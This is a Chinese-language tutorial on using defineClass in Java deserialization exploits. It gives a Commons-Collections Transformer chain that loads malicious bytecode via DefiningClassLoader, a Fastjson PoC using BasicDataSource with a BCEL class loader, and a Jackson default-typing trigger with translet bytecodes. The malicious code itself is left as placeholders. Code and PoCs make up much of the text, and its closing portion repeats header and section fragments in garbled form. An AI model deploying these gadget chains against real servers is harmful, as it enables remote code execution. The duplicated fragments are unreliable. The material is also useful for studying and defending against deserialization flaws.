Java反序列化中defineClass的利用技巧<\/h1>

0x00 前言<\/h2>
`defineClass<\/code>是Java反序列化漏洞利用中的关键技术之一。官方定义中，defineClass<\/code>可以从byte[]<\/code>还原出一个Class<\/code>对象，这为构造Java反序列化利用和漏洞PoC提供了便利。<\/p>`

0x01 defineClass构造回显<\/h2>
常规回显方法<\/h3>
常规回显思路是使用URLClassLoader<\/code>加载.class<\/code>或.jar<\/code>文件：<\/p>

调用loadClass<\/code>加载对应类名<\/li>
返回Class<\/code>对象<\/li>
调用newInstance()<\/code>实例化对象<\/li>
通过抛错方式带回回显结果<\/li>
<\/ol>
\/\/ 示例代码
<\/span><\/span><\/span><\/span>throw<\/span> new<\/span> Exception(<\/span>"genxor"<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>缺点<\/strong>：需要先写入.class<\/code>或.jar<\/code>文件，过程复杂。<\/p>
defineClass优化方案<\/h3>
使用defineClass<\/code>可以直接加载内存中的字节码：<\/p>

将编译好的.class<\/code>文件转换为byte[]<\/code><\/li>
直接用defineClass<\/code>加载返回Class<\/code>对象<\/li>
<\/ol>
由于java.lang.ClassLoader<\/code>的defineClass<\/code>是protected<\/code>属性，无法直接调用，可以使用org.mozilla.classfile.DefiningClassLoader<\/code>类，它重写了defineClass<\/code>且为public<\/code>属性。<\/p>
示例代码<\/strong>：<\/p>
\/\/ 使用DefiningClassLoader加载字节码
<\/span><\/span><\/span><\/span>DefiningClassLoader loader =<\/span> new<\/span> DefiningClassLoader();<\/span>
<\/span><\/span>Class clazz =<\/span> loader.<\/span>defineClass<\/span>(<\/span>"EvilClass"<\/span>,<\/span> evilBytes);<\/span>
<\/span><\/span>Object obj =<\/span> clazz.<\/span>newInstance<\/span>();<\/span>
<\/span><\/span><\/code><\/pre>构造transformerChain生成map对象<\/strong>：<\/p>
\/\/ 构造Transformer链生成Map对象
<\/span><\/span><\/span><\/span>Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>DefiningClassLoader.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getConstructor"<\/span>,<\/span> new<\/span> Class[]{<\/span>Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[]{<\/span>Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"defineClass"<\/span>,<\/span> new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> byte<\/span>[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"EvilClass"<\/span>,<\/span> evilBytes}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"newInstance"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>],<\/span> new<\/span> Object[<\/span>0<\/span>])<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span><\/code><\/pre>0x02 Fastjson利用<\/h2>
漏洞原理<\/h3>
Fastjson早期反序列化漏洞利用com.sun.org.apache.bcel.internal.util.ClassLoader<\/code>。<\/p>
利用PoC格式：<\/p>
{
<\/span><\/span>    "@type"<\/span>: "org.apache.tomcat.dbcp.dbcp.BasicDataSource"<\/span>,
<\/span><\/span>    "driverClassLoader"<\/span>: {
<\/span><\/span>        "@type"<\/span>: "com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span>
<\/span><\/span>    },
<\/span><\/span>    "driverClassName"<\/span>: "
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>BCEL
<\/span><\/span><\/span>$$
<\/span><\/span><\/span>..."<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>org.apache.tomcat.dbcp.dbcp.BasicDataSource<\/code>关键代码：<\/p>
\/\/ 当解析JSON时，会执行Class.forName逻辑
<\/span><\/span><\/span><\/span>Class.<\/span>forName<\/span>(<\/span>driverClassName,<\/span> true<\/span>,<\/span> driverClassLoader);<\/span>
<\/span><\/span><\/code><\/pre>代码执行方式<\/h3>


方式一<\/strong>：通过控制classname<\/code>执行代码<\/p>
public<\/span> class<\/span> Evil<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意代码
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>当被Class.forName<\/code>加载时，静态代码块会执行。<\/p>
<\/li>

方式二<\/strong>：通过控制classname<\/code>和classloader<\/code>执行代码<\/p>

使用com.sun.org.apache.bcel.internal.util.ClassLoader<\/code><\/li>
classname<\/code>是经过BCEL编码的.class<\/code>文件<\/li>
<\/ul>
<\/li>
<\/ol>
BCEL加载流程<\/strong>：<\/p>

ClassLoader<\/code>加载类时，判断classname<\/code>是否经过BCEL编码<\/li>
解码获取Class文件字节码<\/li>
调用defineClass<\/code>还原出类<\/li>
静态代码块在加载过程中执行<\/li>
<\/ol>
0x03 Jackson利用<\/h2>
Jackson反序列化漏洞与Fastjson类似，也是注入精心构造的.class<\/code>文件，通过newInstance<\/code>触发执行。<\/p>
PoC示例<\/strong>：<\/p>
public<\/span> class<\/span> Pwn<\/span> {<\/span>
<\/span><\/span>    static<\/span> {<\/span>
<\/span><\/span>        \/\/ 恶意代码
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>触发代码<\/strong>：<\/p>
ObjectMapper mapper =<\/span> new<\/span> ObjectMapper();<\/span>
<\/span><\/span>mapper.<\/span>enableDefaultTyping<\/span>();<\/span>
<\/span><\/span>String json =<\/span> "[\"foo.Pwn\", {\"transletBytecodes\":[\"...\"], \"transletName\":\"a.b\"}]"<\/span>;<\/span>
<\/span><\/span>mapper.<\/span>readValue<\/span>(<\/span>json,<\/span> Object.<\/span>class<\/span>);<\/span>
<\/span><\/span><\/code><\/pre>执行流程<\/strong>：<\/p>

defineTransletClasses<\/code>解码transletBytecodes<\/code>为byte[]<\/code><\/li>
执行defineClass<\/code>得到类<\/li>
执行newInstance<\/code>触发静态代码块<\/li>
<\/ol>
0x04 总结<\/h2>
利用defineClass<\/code>可以在运行时将构造的class文件加载到ClassLoader<\/code>中，通过Java的static{}<\/code>特性实现代码执行。关键点包括：<\/p>

使用替代的ClassLoader<\/code>（如DefiningClassLoader<\/code>）绕过访问限制<\/li>
利用静态代码块实现无实例化执行<\/li>
结合BCEL等编码方式隐藏恶意代码<\/li>
在Fastjson\/Jackson等反序列化场景中的应用<\/li>
<\/ol>
0x05 参考资源<\/h2>
测试代码仓库：https:\/\/github.com\/genxor\/Deserialize.git<\/p>

Java反序列化中defineClass的利用技巧<\/h1>

0x00 前言<\/h2> defineClass<\/code>是Java反序列化漏洞利用中的关键技术之一。官方定义中，defineClass<\/code>可以从byte[]<\/code>还原出一个Class<\/code>对象，这为构造Java反序列化利用和漏洞PoC提供了便利。<\/p>

0x02 Fastjson利用<\/h2>

0x05 参考资源<\/h2> 测试代码仓库：https:\/\/github.com\/genxor\/Deserialize.git<\/p>

0x00 前言<\/h2>
`defineClass<\/code>是Java反序列化漏洞利用中的关键技术之一。官方定义中，defineClass<\/code>可以从byte[]<\/code>还原出一个Class<\/code>对象，这为构造Java反序列化利用和漏洞PoC提供了便利。<\/p>`

0x05 参考资源<\/h2>
测试代码仓库：https:\/\/github.com\/genxor\/Deserialize.git<\/p>